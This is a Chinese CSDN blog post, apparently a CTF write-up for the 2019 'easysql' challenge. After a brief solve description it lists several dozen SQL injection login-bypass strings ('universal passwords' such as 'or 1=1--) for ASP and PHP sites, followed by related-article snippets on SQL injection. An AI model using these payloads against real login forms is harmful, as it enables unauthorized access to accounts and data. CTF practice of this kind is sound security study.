[极客大挑战2019]easysql

最新推荐文章于 2024-04-22 10:04:12 发布
最新推荐文章于 2024-04-22 10:04:12 发布
阅读量1.1k 收藏 5
点赞数 2
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43952190/article/details/105696239
版权

easysql

在这里插入图片描述
进入后这样的页面,正常用会报错,然后用burp扫一下。
在这里插入图片描述
尽然就出来了!
原来要用万能密码就行了,现在总结一下 万能密码:

aspaspx万能密码
1:"or “a”="a
2:‘.).or.(’.a.’=’.a
3:or 1=1–
4:'or 1=1–
5:a’or’ 1=1–
6:"or 1=1–
7:'or.‘a.’='a
8:“or”="a’='a
9:‘or’’=’
10:‘or’=‘or’
11:admin’or 1=1#
phpPHP万能密码
1'or 1=1/*
2"or “a”="a
3"or 1=1–
4“or”="
5“or”="a’='a
6"or1=1–
7“or=or”
8'‘or’=‘or’
9') or (‘a’='a
10‘.).or.(’.a.’=’.a
11'or 1=1
12'or 1=1–
13'or 1=1/*
14‘or"="a’='a
15‘or’ ‘1’=‘1’
16‘or’’=’
17‘or’’=’‘or’’=’
18‘or’=‘1’
19‘or’=‘or’
20'or.‘a.’='a
21'or1=1–
221’or’1’='1
23a’or’ 1=1–
24a’or’1=1–
25or ‘a’=‘a’
26or 1=1–
27or1=1–
admin’/*密码*/’
marsxu626
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
阿里云IoT创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 创新挑战赛》的分享,就挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
ISCC2019个人挑战赛题目练习
05-05
【ISCC2019个人挑战赛题目练习】是一次针对网络安全技术的竞赛,旨在提升参赛者在信息安全领域的技能和实战经验。此类挑战通常涵盖多种技术领域,包括但不限于密码学、漏洞分析、网络嗅探、逆向工程、Web安全以及...
BUUCTF[挑战 2019] EasySQL 1
m0_75178803的博客
06-12 4243
因为这道题是基于sql单引号的注入,我们构造万能密码,#在sql注入中是注释符。题目来源:BUUCTF [挑战 2019] EasySQL 1。用or连接,因为1=1恒真,假或真=真,真或真=真,所以这个语句恒成立。输入 1' union select 1,2,3。查看报错信息发现是基于单引号的注入。由一道题简单引出万能密码的知识点。这是查询数据库可能会用到的句型。只有当输入1’时,页面报错。直接在用户名或者密码区输入。只有当列名字段数为3时,
挑战 2019】EasySQL
Knsec
05-13 8739
[挑战 2019] EasySQL 判断是数字还是字符型注入 正常查询的回显 输入字符型判断一下,发现报错了,看报错显示 ‘1’‘’,输入的是1’,这里查询语句中应该是存在一个单引号的,所以这里报错了,多了一个单引号,说明这里存在字符型的注入,先用万能钥匙测测 使用万能钥匙一测,第一次 正常回显错误,然后又用字符型的测了一下,发现这里的报错中带有 一部分的查询语句 # 万能公式 1 and 1=1 1' and '1'='1 1 or 1=1 1' or '1'='1
探索易用的数据库管理工具:EasySQL
最新发布
gitblog_00063的博客
04-22 431
探索易用的数据库管理工具:EasySQL 项目地址:https://gitcode.com/CarmJos/EasySQL 项目简介 EasySQL 是一个轻量级、高效的在线SQL查询工具,旨在为开发者和数据分析师提供方便快捷的数据库管理体验。它支持多种主流数据库系统,包括MySQL、PostgreSQL、SQLite等,并且具有强大的代码补全、语法高亮、查询结果可视化等功能。 技术分析 多数据库...
Buuctf-Web-[挑战 2019]EasySQL 1 题解及思路总结
m0_62239233的博客
09-16 8682
SQL注入。
[BUUCTF]挑战 2019EasySQL1 write up
GZWZ_的博客
03-25 3157
这道题很简单,就是想推一下万能密码,So浅写一下啦!
【BUUCTF】[挑战 2019]EasySQL 1
qq_45972928的博客
05-06 957
根据题目可知,这是大概率是一道SQL注入题 知识点——万能密码原理: 原本查询username = ’username‘,我们要尝试对引号进行闭合,所以当username=1’ or’1’='1时,id = '1’ or ‘1’=‘1’,成功闭合了两边的引号并加上了我们写的语句 1、进入网站 2、尝试登录 3、加单引号,双引号等方法粗略判断是否存在注入 4、可以看到存在注入点,而且这是大可能是一个单引号的字符型注入。尝试单引号相关的万能密码 username=1’ or ‘1’=‘1&
2019年三诺集团四周年庆典摇滚跑活动方案.pptx
05-06
此文档描述的是2019年三诺集团四周年庆典的一项独特活动——“摇滚跑”。这是一场集科技、运动和音乐于一体的大型庆典,旨在庆祝三诺集团的周年纪念,并促进北海市高新产业园及其相关企业的交流与合作。活动的...
天池Apache Flink挑战赛-垃圾图片分类算法源码+项目说明.zip
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink挑战赛-垃圾图片分类算法源码+项目说明.zip
学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 学院JAVA视频教程 新版 7大部分
BUUCTF WEB [挑战 2019]Secret File
Y1da的博客
04-09 1830
BUUCTF WEB [挑战 2019]Secret File 启动后效果如下 F12查看源代码 <!DOCTYPE html> <html> <style type="text/css" > #master { position:absolute; left:44%; bottom:0; text-align :center; } p,h1 { curso
buuctf [挑战 2019]EasySQL1(新手向)
wwllzz683的博客
10-26 287
记一下就好以后在测试注入漏洞是可以用到,,,这个记法也很简单他是吧”or“和”=“用。点开连接后一个很有黑风格的页面,有用户名和密码两个输入框。这些固定的flag不同,大多数都是一人一flag。的web题,输入admin基本上都是对的)根据题目Easy SQL,就知道需要用到。输入后,点击登录,flag就出来了。(这个是sql注入中的”注意:web的flag和。‘ 给包含起来了)密码学(crypto)
[SUCTF 2019]EasySQL
记录学习,一起进步
01-13 1648
[SUCTF 2019]EasySQL
php mysql盲注_PHP安全:SQL注入漏洞
weixin_39872222的博客
02-28 227
原标题:PHP安全:SQL注入漏洞本文介绍由于PHP的不安全编码引起的各类SQL注入。经常看到网站被拖库,造成信息泄露,主要就是SQL注入漏洞造成的。1、什么是SQL注入SQL注入漏洞为PHP研发人员所熟知,它是所有漏洞类型中危害最严重的漏洞之一。SQL注入漏洞,主要是通过伪造户端请求,把SQL命令提交到服务端进行非法请求的操作,最终达到欺骗服务器从而执行恶意的SQL命令。研发人员在处理应用程序...
[挑战 2019]EasySQL 1
TID12的博客
11-21 36
从1尝试到4,发现从4开始就报错。利用联合注入来判断列数。说明列数一共只有3列。
刷题 - BUUCTF(BUUOJ) - WEB - DAY3
qq_36902977的博客
07-09 388
BUUCTF BUUOJ WEB 刷题 学习笔记 SQL注入 万能密码
CTF [挑战 2019]EasySQL Writeup 万能密码
baynk的博客
04-06 3142
这个诚不欺我,真的很简单。。。 一顿操作后没发现什么有用的信息,输入了个admin/admin 跳转到了check.php了,在username处加个常规的'看是否有报错。 真的有,尝试万能密码admin' or '1'='1 但是没出结果,但是这里肯定是用注入的,接着使用,第二种,不去判断密码的正确性。admin' or 1=1 %23 直接就出来了,这里还可以在password处再用...
挑战 2019]EasySQL
09-03
EasySQL挑战 2019 中的一个题目,它是一个简单的 SQL 数据库查询题目。可以通过编写 SQL 查询语句来实现对给定的数据库表进行数据查询和分析。 在 EasySQL 中,你将面对一个包含不同表的数据库,你需要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值